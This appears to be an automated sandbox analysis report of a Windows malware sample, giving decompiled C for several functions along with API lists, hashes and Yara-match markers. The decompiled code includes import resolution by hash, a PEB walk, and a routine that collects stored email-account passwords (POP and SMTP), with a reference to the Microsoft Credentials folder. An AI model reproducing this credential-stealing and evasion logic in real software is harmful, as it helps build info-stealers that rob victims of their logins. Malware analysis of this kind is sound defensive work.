                                            • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                            • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                            • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                                            0x00403b72
                                            0x00403b7a
                                            0x00403b7d

                                            APIs
                                            • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExistsFilePath
                                            • String ID:
                                            • API String ID: 1174141254-0
                                            • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                            • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                            • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                            • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            APIs
                                            • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: closesocket
                                            • String ID:
                                            • API String ID: 2781271927-0
                                            • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                            • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                            • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                            • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403FBF, Relevance: 1.3, APIs: 1, Instructions: 33COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403FBF(intOrPtr _a4) {
				void* _t2;
				void* _t12;

				_t2 = E00402B7C(0x208); // executed
				_t12 = _t2;
				if(_t12 == 0) {
					L4:
					return 0;
				}
				E00402B4E(_t12, 0, 0x208);
				if(E00403B98(_a4, _t12, 0x104) == 0) {
					GetLastError();
					E00402BAB(_t12);
					goto L4;
				}
				return _t12;
			}





                                            0x00403fca
                                            0x00403fcf
                                            0x00403fd4
                                            0x00404005
                                            0x00000000
                                            0x00404005
                                            0x00403fda
                                            0x00403ff2
                                            0x00403ff8
                                            0x00403fff
                                            0x00000000
                                            0x00404004
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                              • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                            • GetLastError.KERNEL32(00000001,%s\Microsoft\Credentials,00000000,00000000,0040FA23), ref: 00403FF8
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateErrorLastProcess
                                            • String ID:
                                            • API String ID: 3278255179-0
                                            • Opcode ID: 5d355a1956dd76799a6e2a6fec7f3965d8d6b4db95ded28d5aea558ae739c6f3
                                            • Instruction ID: f7c486388e582fdd83a8ec6d56402c07db653bfffd511ff88b26ec3936c06817
                                            • Opcode Fuzzy Hash: 5d355a1956dd76799a6e2a6fec7f3965d8d6b4db95ded28d5aea558ae739c6f3
                                            • Instruction Fuzzy Hash: 70E09B6260151037D1217D565C0DE9F7E2C8F82BA9F04003BF604B51D1D97CA50141ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                                            0x00403fac
                                            0x00403fba
                                            0x00403fbe

                                            APIs
                                            • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeVirtual
                                            • String ID:
                                            • API String ID: 1263568516-0
                                            • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                            • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                            • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                            • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                                            0x0040647f
                                            0x00406487
                                            0x0040648a

                                            APIs
                                            • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                            • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                            • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                            • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                                            0x004058f8
                                            0x00405903
                                            0x00405906

                                            APIs
                                            • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                            • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                            • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                            • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                                            0x00405932
                                            0x0040593d
                                            0x00405940

                                            APIs
                                            • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                            • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                            • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                            • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0040438F
                                            • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                            • VariantInit.OLEAUT32(?), ref: 004043C4
                                            • SysAllocString.OLEAUT32(?), ref: 004043CD
                                            • VariantInit.OLEAUT32(?), ref: 00404414
                                            • SysAllocString.OLEAUT32(?), ref: 00404419
                                            • VariantInit.OLEAUT32(?), ref: 00404431
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: InitVariant$AllocString$CreateInitializeInstance
                                            • String ID:
                                            • API String ID: 1312198159-0
                                            • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                            • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                            • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                            • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                                            0x0040d070
                                            0x0040d080
                                            0x0040d084
                                            0x0040d086
                                            0x0040d08c
                                            0x0040d0a0
                                            0x0040d0ae
                                            0x0040d0bd
                                            0x0040d0c0
                                            0x0040d0c5
                                            0x0040d0c9
                                            0x0040d0e3
                                            0x0040d0f2
                                            0x0040d101
                                            0x0040d104
                                            0x0040d109
                                            0x0040d110
                                            0x0040d11e
                                            0x0040d123
                                            0x0040d126
                                            0x0040d12d
                                            0x0040d145
                                            0x0040d154
                                            0x0040d15a
                                            0x0040d166
                                            0x0040d174
                                            0x0040d186
                                            0x0040d18e
                                            0x0040d19a
                                            0x0040d1ac
                                            0x0040d1ba
                                            0x0040d1cc
                                            0x0040d1d1
                                            0x0040d1dd
                                            0x0040d1e2
                                            0x0040d1e7
                                            0x0040d1e7
                                            0x0040d1e7
                                            0x0040d1eb
                                            0x0040d1f1
                                            0x0040d1f7
                                            0x0040d1ff
                                            0x0040d207
                                            0x0040d20f
                                            0x0040d217
                                            0x0040d21f
                                            0x0040d227
                                            0x0040d230

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                            • API String ID: 0-2111798378
                                            • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                            • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                            • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                            • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040317B, Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 90%
                                            			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}














                                            0x0040317f
                                            0x00403180
                                            0x00403180
                                            0x00403180
                                            0x0040318d
                                            0x00403196
                                            0x00403199
                                            0x0040319b
                                            0x004031a1
                                            0x004031a9
                                            0x004031ab
                                            0x004031ac
                                            0x004031ae
                                            0x00000000
                                            0x004031b0
                                            0x004031b3
                                            0x004031c2
                                            0x004031c7
                                            0x004031cd
                                            0x004031e0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004031cd
                                            0x004031d7
                                            0x004031dd
                                            0x004031cf
                                            0x004031cf
                                            0x004031d1
                                            0x004031d5
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                            • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                            • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                            • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                            Uniqueness

                                            Uniqueness Score: -1.00%